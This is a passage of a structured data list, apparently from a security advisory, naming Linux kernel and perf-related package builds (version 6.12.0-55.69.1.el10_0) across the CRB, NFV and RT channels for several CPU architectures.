"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"NFV-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
